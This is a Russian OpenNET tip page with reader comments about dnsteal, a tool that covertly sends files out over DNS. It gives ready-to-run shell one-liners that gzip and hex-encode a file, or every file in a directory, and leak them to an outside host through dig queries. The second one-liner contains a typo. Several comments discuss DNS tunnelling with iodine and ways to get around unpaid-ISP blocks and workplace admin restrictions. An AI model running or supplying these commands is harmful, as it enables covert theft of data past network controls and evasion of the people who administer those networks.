The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

Скрытая отправка файлов через DNS
В рамках проекта https://github.com/m57/dnsteal развивается фиктивный
DNS-сервер, позволяющий организовать скрытую отправку файлов по протоколу DNS,
используя штатные системные утилиты резолвинга. Для уменьшения трафика
поддерживается сжатие передаваемого содержимого.


Запускаем сервер ("-z" - включает сжатие):

   python dnsteal.py 192.168.1.1 -z


Для отправки файла send.txt на внешний хост 192.168.1.1, на котором запущен
dnsteal, достаточно выполнить:

   for b in $(gzip -c send.txt | xxd -p); do dig @192.168.1.1 $b.filename.com; done

Для отправки всех файлов из текущей директории

   for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @192.168.1.1 %b.$filename.com; done; done
 
11.10.2015
Ключи: dns, file / Лицензия: CC-BY
Раздел:    Корень / Администратору / Сетевые сервисы / DNS

Обсуждение [ Линейный режим | Показать все | RSS ]
 
  • 1.1, a9a83j43nja09gje, 23:12, 10/10/2015 [ответить] [смотреть все]
  • +/
    текущая версия на гитхабе не заработала) заработал форк там же на гитхабе, файл 1 мб отправлялся больше 6 часов, так и не отправился) надо было идти домой
    идея не нова, но интересно и доступно!)
     
  • 1.2, fleonis, 12:58, 11/10/2015 [ответить] [смотреть все]
  • +/
    в смысле отправить файл, замаскировав его под обычный dns запрос?
     
  • 1.3, Nas_tradamus, 15:37, 11/10/2015 [ответить] [смотреть все]
  • +/
    Но есть же iodine для более коварных вещей.
    Тестил - работает. Эта штука позволяет заворачивать весь ipv4-трафиик через DNS.
     
     
  • 2.4, Аноним, 20:49, 11/10/2015 [^] [ответить] [смотреть все] [показать ветку]
  • +/
    Вся прелесть предложенного решения в том, что на клиенте достаточно обычного she... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.19, анонимаус, 10:56, 27/10/2015 [^] [ответить] [смотреть все]  
  • +/
    администраторам localnet чтоли вся прелесть iodine в том, что он работает и за... весь текст скрыт [показать]
     
     
  • 4.22, Pahanivo, 15:11, 24/11/2015 [^] [ответить] [смотреть все]  
  • +/
    вот именно, что вся эта бредовая идея идет в опу, если админ держить днс на шлюз... весь текст скрыт [показать]
     
     
  • 5.24, AdVv, 15:43, 30/06/2016 [^] [ответить] [смотреть все]  
  • +/
    Наводящий вопрос откуда днс на шлюзе местного админа берет информацию о неизв... весь текст скрыт [показать]
     
  • 1.5, Crazy Alex, 21:03, 12/10/2015 [ответить] [смотреть все]  
  • +/
    Добавили бы fold чтобы не по одному байту посылать, а по 10, например:

    for b in $(gzip -c send.txt | xxd -p |fold -b10); do dig @192.168.1.1 $b.filename.com; done

     
     
  • 2.6, Аноним, 13:10, 14/10/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Это у вас такой странных xxd Опция -p как раз и нужна для того, чтобы не раздел... весь текст скрыт [показать] [показать ветку]
     
  • 1.7, Виталий, 12:33, 15/10/2015 [ответить] [смотреть все]  
  • +/
    dig @192.168.1.1
    так если у вас открыт порт на удаленном сервере - можно все что угодно. вот если бы  dig @днспровайдера\конторы\которая не выпускает ничего больше как через Собственных днс сервре ....
    в общем костыль к квадратному колесу
     
     
  • 2.8, Alex, 22:28, 15/10/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Элементарно, ватсон Чуть переписываете шеловую команду префиксуете байты, чтоб... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.17, НьюВасюковец, 13:24, 26/10/2015 [^] [ответить] [смотреть все]  
  • +/
    Без примера -это просто трепология.
     
  • 1.9, YetAnotherOnanym, 15:23, 16/10/2015 [ответить] [смотреть все]  
  • +/
    А зачем писать отдельный демон, когда можно просто прогрепать логи бинда (или кто там крутится) и вытащить фрагменты из сообщений об ошибках? А ещё вопрос - если у провайдера несколько роутов к целевому хосту и запросы прибудут не в том порядке, в каком они были отправлены - с этим что делать?
     
  • 1.10, Аннонним, 05:58, 17/10/2015 [ответить] [смотреть все]  
  • +/
    Подумал халявный интернет изобрели, оказалось нет - 6 часов, пусть даже на файл 1 мб, это слишком долго.
     
     
  • 2.11, pavlinux, 01:52, 18/10/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    У нормального провайдера, с неоплаченным инетом, запросы дальше фаервола не ходят.  
     
     
  • 3.12, count0krsk, 06:29, 18/10/2015 [^] [ответить] [смотреть все]  
  • +/
    Так и есть. Даже днс-запросы режут, не говоря о пингах. Причем ВСЕ провайдеры, с которыми сталкивался. Исключение - пиринговые ресурсы. Они работают свободно. А т.к. в городском пиринге почти все провайдеры, просто поднимается прокся у другого прова, и через неё работаете, если лень платить идти. Ещё можно так с работы сидеть в необрезанном инете, если вы - кодер, а злой админ закрыл вконтактик.
     
     
  • 4.20, Аноним, 22:04, 20/11/2015 [^] [ответить] [смотреть все]  
  • +/
    Если вы кодер, а злой админ закрыл вконтактик, то что вам мешает пробросить ssh-... весь текст скрыт [показать]
     
  • 3.13, Анонимус III, 11:05, 18/10/2015 [^] [ответить] [смотреть все]  
  • +/
    У моего провайдера с неоплаченным интернетом работал сайт провайдера. А на сайте провайдера была бесплатная почта, ящик 10 МБ. И через POP3/IMAP/SMTP она тоже была доступна. Запустил на работе демона, который по почте получал URL, скачивал его, разбивал на куски размером 10 МБ и отсылал на тот бесплатный ящик. А дома другой демон доставал куски из ящика и собирал воедино. Недели три так сидел, из спортивного интереса.
     
     
  • 4.14, Мимо проходил, 09:45, 20/10/2015 [^] [ответить] [смотреть все]  
  • +/
    А можно поподробней про реализацию?
     
     
  • 5.16, pavlinux, 01:27, 23/10/2015 [^] [ответить] [смотреть все]  
  • +/
    > А можно поподробней про реализацию?

    До макдональца быстрее добежать.

     
  • 5.18, НьюВасюковец, 13:28, 26/10/2015 [^] [ответить] [смотреть все]  
  • +/
    > А можно поподробней про реализацию?

    таких примеров жопой жуй
    http://habrahabr.ru/post/65322/

     
  • 4.15, Аноним, 12:17, 22/10/2015 [^] [ответить] [смотреть все]  
  • +/
    прям как Столман
     
  • 1.21, DmA, 10:25, 22/11/2015 [ответить] [смотреть все]  
  • +/
    лучше бы придумали как DNS пакеты нельзя было ни подменить, ни посмотреть что там внутри ходит...
     
     
  • 2.23, nuclight, 14:29, 27/11/2015 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    dnscrypt от djb сто лет как
     
  • 1.25, freehck, 15:50, 03/11/2016 [ответить] [смотреть все]  
  • +/
    Имхо легче туннель через 443й порт повесить, используя, скажем, sslh. 443й обычно открыт, а что ты там внутри туннеля шлёшь никто всё равно не прочитает. А 53й с весьма большой вероятностью может быть и закрыт.
     

    Ваш комментарий
    Имя:         
    E-Mail:      
    Заголовок:
    Текст:




      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor